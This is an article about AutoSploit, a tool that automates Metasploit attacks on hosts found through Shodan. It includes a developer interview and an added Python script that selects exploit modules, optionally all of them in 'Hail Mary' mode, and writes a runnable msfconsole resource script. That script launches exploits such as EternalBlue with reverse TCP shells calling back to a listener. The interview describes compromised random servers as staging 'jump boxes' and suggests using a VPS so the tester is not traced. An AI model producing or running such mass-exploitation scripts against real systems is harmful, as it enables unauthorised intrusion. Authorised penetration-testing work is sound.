The Metasploit Framework has existed in some form since H.D. Moore first developed it in 2003. It is very popular penetration testing software, and Rapid7 saw its potential when it acquired the Metasploit Project in 2009. Over 1,600 exploits and nearly 500 payloads have been developed for the Framework, targeting a plethora of operating systems and applications. As of 2018, the Metasploit Framework is free and open source, while Metasploit Pro is paid software with commercial support.
On January 30th, VectorSEC announced on Twitter that they had developed AutoSploit, a Python script that drives Metasploit. It does what its name suggests: it automates Metasploit exploitation sessions, collecting targets from Shodan and running modules against them. It has been released on GitHub as open source software under the GPL v3.0 license.
Here’s a description from the README file on GitHub:
“As the name might suggest, AutoSploit attempts to automate the exploitation of remote hosts. Targets are collected automatically as well by employing the Shodan.io API… the 'Exploit' component of the program will go about the business of attempting to exploit these targets by running a series of Metasploit modules against them. Which Metasploit modules will be employed in this manner is determined by programmatically comparing the name of the module to the initial search query. However, I have added functionality to run all available modules against the targets in a 'Hail Mary' type of attack as well...”
AutoSploit sounds like an exciting new tool for network vulnerability testers, so I asked VectorSEC (VS) a few questions about it.
I asked about the development process:
VS: “I am a fan of automation and programming in general. I wanted to see if I could make Metasploit even easier to use so I did. I didn't exactly keep count of how long it took to develop, but all in all I would say I spent a good couple of days getting everything set up properly.”
How can AutoSploit benefit red teams?
VS: “I would say that if you intend to use this program in an engagement as a red teamer, then it might be a good idea to provide your own host list. An engagement like that is really directed at a specific company’s infrastructure, while AutoSploit's manner of collecting targets is rather broad: you input a platform and you get a list of IPs returned from Shodan. These can be from all over the world of course, which is not exactly a directed approach to pentesting a company. However, by gathering targets from Shodan, you are able to easily get the low hanging fruit. These servers can later be used as staging servers or jump boxes for later operations.”
Can AutoSploit really make work done with Metasploit more efficient?
VS: “I would say so. While AutoSploit is busy running various Metasploit modules on the gathered targets, the pentester has more time to focus on other tasks.”
What should pentesters who are considering trying AutoSploit know beforehand?
VS: “If anyone is thinking of using the program ‘as is,’ they need to be aware that AutoSploit will try to get Reverse TCP shells. These connect to the IP address you set up. If that IP is linked to your home setup, you might get in trouble. I don't condone anything illegal, but it might be best practice to run the tool from a virtual private server that has the dependencies you need installed. Happy hacking!”
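To make two points from the interview concrete, here is an added Python example written for this article; it is not AutoSploit's own code. It models the README's module-selection rule (a module is used when its name matches the Shodan search query, or every module is used in "Hail Mary" mode), adds the scope check that VectorSEC recommends for red-team use (keep only hosts inside ranges you are authorised to test), and emits a Metasploit resource script whose LHOST line is exactly the setting the warning above is about: every reverse TCP shell will call back to that address, so it should point at your engagement VPS, not your home connection. The module list, host list, scope range and LHOST value are constructed sample data, not output from Shodan or AutoSploit.

```python
"""Added example modelled on the AutoSploit README, not the project's code."""
from __future__ import annotations

import ipaddress
from typing import Iterable

# Constructed sample of Metasploit module paths (real module names, small list).
SAMPLE_MODULES = [
    "exploit/multi/http/apache_mod_cgi_bash_env_exec",
    "exploit/multi/http/struts2_content_type_ognl",
    "exploit/windows/smb/ms17_010_eternalblue",
    "exploit/unix/webapp/wp_admin_shell_upload",
    "exploit/linux/http/apache_continuum_cmd_exec",
]

# Constructed stand-in for what a Shodan search returns: addresses plus noise.
SAMPLE_HOSTS = ["203.0.113.10", "203.0.113.25", "not-an-ip", "198.51.100.7"]


def select_modules(query: str, modules: Iterable[str], hail_mary: bool = False) -> list[str]:
    """README rule: keep modules whose name contains a token of the search query.
    hail_mary=True keeps everything, as in the README's 'Hail Mary' mode."""
    modules = list(modules)
    if hail_mary:
        return modules
    tokens = [t.lower() for t in query.split()]
    return [m for m in modules if any(t in m.lower() for t in tokens)]


def scope_hosts(hosts: Iterable[str], allowed_cidrs: Iterable[str]) -> list[str]:
    """The interview's 'provide your own host list' advice, enforced in code:
    discard anything that is not a valid IP or lies outside the authorised ranges."""
    nets = [ipaddress.ip_network(c, strict=False) for c in allowed_cidrs]
    kept = []
    for h in hosts:
        try:
            ip = ipaddress.ip_address(h.strip())
        except ValueError:
            continue  # hostnames, blank lines, API noise
        if any(ip in n for n in nets):
            kept.append(str(ip))
    return kept


def build_resource_script(modules: Iterable[str], hosts: Iterable[str],
                          lhost: str, lport: int = 4444) -> str:
    """Emit an msfconsole resource script (run with `msfconsole -r file.rc`).
    LHOST is where every reverse TCP payload connects back to; set it to the
    engagement VPS, never a home address. RHOSTS accepts a space-separated
    list on current Metasploit; older modules take a single RHOST instead."""
    hosts = list(hosts)
    if not hosts:
        raise ValueError("no in-scope hosts; refusing to write an empty attack script")
    lines = ["# generated resource script; review before running"]
    for mod in modules:
        lines += [
            f"use {mod}",
            f"set RHOSTS {' '.join(hosts)}",
            f"set LHOST {lhost}",
            f"set LPORT {lport}",
            "exploit -j -z",  # background job, do not interact with sessions yet
        ]
    lines.append("# sessions -l shows the shells that called back to LHOST")
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    # Hypothetical engagement: scope is 203.0.113.0/24, VPS listener is 192.0.2.5.
    mods = select_modules("apache", SAMPLE_MODULES)
    targets = scope_hosts(SAMPLE_HOSTS, ["203.0.113.0/24"])
    print(build_resource_script(mods, targets, lhost="192.0.2.5"))
```

With the query "apache" only the two Apache modules are selected and 198.51.100.7 is dropped as out of scope; switching to `hail_mary=True` runs all five modules against the same hosts, which is the noisy mode the README describes.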
Instructions for downloading and using AutoSploit can be found on GitHub.